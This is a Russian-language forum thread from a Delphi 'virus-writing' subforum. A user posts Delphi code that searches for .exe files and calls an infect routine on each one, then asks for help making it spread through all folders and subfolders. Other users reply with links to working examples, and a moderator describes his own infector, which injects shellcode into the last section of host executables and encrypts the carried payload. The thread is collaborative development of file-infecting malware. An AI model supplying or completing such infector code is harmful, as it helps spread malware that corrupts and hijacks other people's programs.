Суббота, 24.06.2017, 15:09 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » HLLP СРОЧНО! (Очень нужна помощь!)
HLLP СРОЧНО!
SlashДата: Пятница, 11.01.2013, 21:59 | Сообщение # 1
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 161
Статус: Offline
var
FR : INTEGER;
sr:tsearchrec;
begin
DeleteFile(TmpName);
FR:=FindFirst('*.exe',faAnyFile-faDirectory,SR);
while FR=0 do
begin
if CheckInfect(SR.Name) then
infect(SR.Name);
FR:=findnext(SR);
end;
InRun;
end.

Вот поиск и заражение,правьте чтоб искала во всех папках и подпапках!
 
ms301Дата: Пятница, 11.01.2013, 22:01 | Сообщение # 2
Участник
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 98
Статус: Offline
Это приказ? biggrin
 
SlashДата: Пятница, 11.01.2013, 22:08 | Сообщение # 3
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 161
Статус: Offline
Цитата (ms301)
Это приказ?

HET!
Но нужно срочно!
 
ms301Дата: Пятница, 11.01.2013, 22:22 | Сообщение # 4
Участник
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 98
Статус: Offline
да и процедура заражения тут не описана +_+

Добавлено (11.01.2013, 22:22)
---------------------------------------------
Вот рабочий пример.

 
SlashДата: Пятница, 11.01.2013, 22:23 | Сообщение # 5
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 161
Статус: Offline
Цитата (ms301)
да и процедура заражения тут не описана +_+
Добавлено (11.01.2013, 22:22)
---------------------------------------------
Вот рабочий пример.


Да мне не это надо,мой код поправь!
 
ms301Дата: Пятница, 11.01.2013, 22:48 | Сообщение # 6
Участник
Зарегистрирован: 28.11.2012
Группа: Пользователи
Сообщений: 98
Статус: Offline
Поиск. Взял на этом сайте, за что отдельное спасибо автору-помог мне с курсачем biggrin

А заражение-ХЗ как ты там заражаешь....


Сообщение отредактировал ms301 - Пятница, 11.01.2013, 22:51
 
Don_DiegoДата: Пятница, 11.01.2013, 23:56 | Сообщение # 7
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 251
Статус: Offline
http://delfcode.ru/forum/10-922-1
 
C@TДата: Суббота, 12.01.2013, 04:36 | Сообщение # 8
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
http://delfcode.ru/forum/10-324-1
блин, давным давно писал крутой пример заражения ехе, все свел к одной процедуре,

procedure Infect(FileName:string;SeacondFileName:string);
FileName - файл который заразить
SeacondFileName - файл которым заразить

в результате работы функции появлятся файл infected.exe, при запуске которого выполнялся сперва файл которым заразили, а потом файл который заразили, все заражение проходило инжектом ассемблерного шелл кода в последнюю секцию жертвы, при чем тело файла которым заражали криптовалось и размер был равен, первый файл + второй файл + 800 байт
вылодил все исходники и никто не пользуется, обидно даже :/

З.Ы на представлненный код не ругайтесь, писалось давно, я тогда только 9-й класс закончил biggrin


 
C@TДата: Суббота, 12.01.2013, 04:43 | Сообщение # 9
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Цитата (Slash)
Вот поиск и заражение,правьте чтоб искала во всех папках и подпапках!

ознакомится с понятием рекурсии wink


 
SlashДата: Суббота, 12.01.2013, 15:23 | Сообщение # 10
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 161
Статус: Offline
Спасибо всем ребята,реально помогли! biggrin
 
Anton93Дата: Пятница, 13.09.2013, 10:38 | Сообщение # 11
Продвинутый
Зарегистрирован: 06.01.2010
Группа: Модераторы
Сообщений: 320
Статус: Offline
C@T,
Цитата
З.Ы на представленный код не ругайтесь, писалось давно, я тогда только 9-й класс закончил

в девятом классе я мог только мечтать о писании на ASM


ICQ: 41896
 
dolphinДата: Пятница, 13.09.2013, 13:12 | Сообщение # 12
Администратор
Сообщений: 902
Статус: Offline
ОФФТОП для Anton93



Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
Don_DiegoДата: Пятница, 13.09.2013, 20:52 | Сообщение # 13
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 251
Статус: Offline
Оффтоп
 
SlashДата: Суббота, 14.09.2013, 17:43 | Сообщение # 14
Постоянный
Зарегистрирован: 20.12.2012
Группа: Пользователи
Сообщений: 161
Статус: Offline
Теме 100 лет, с тем HLLP справился уже довольно давно. Тему можно закрывать.
 
delfcode » Delphi » Вирусология Delphi » HLLP СРОЧНО! (Очень нужна помощь!)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz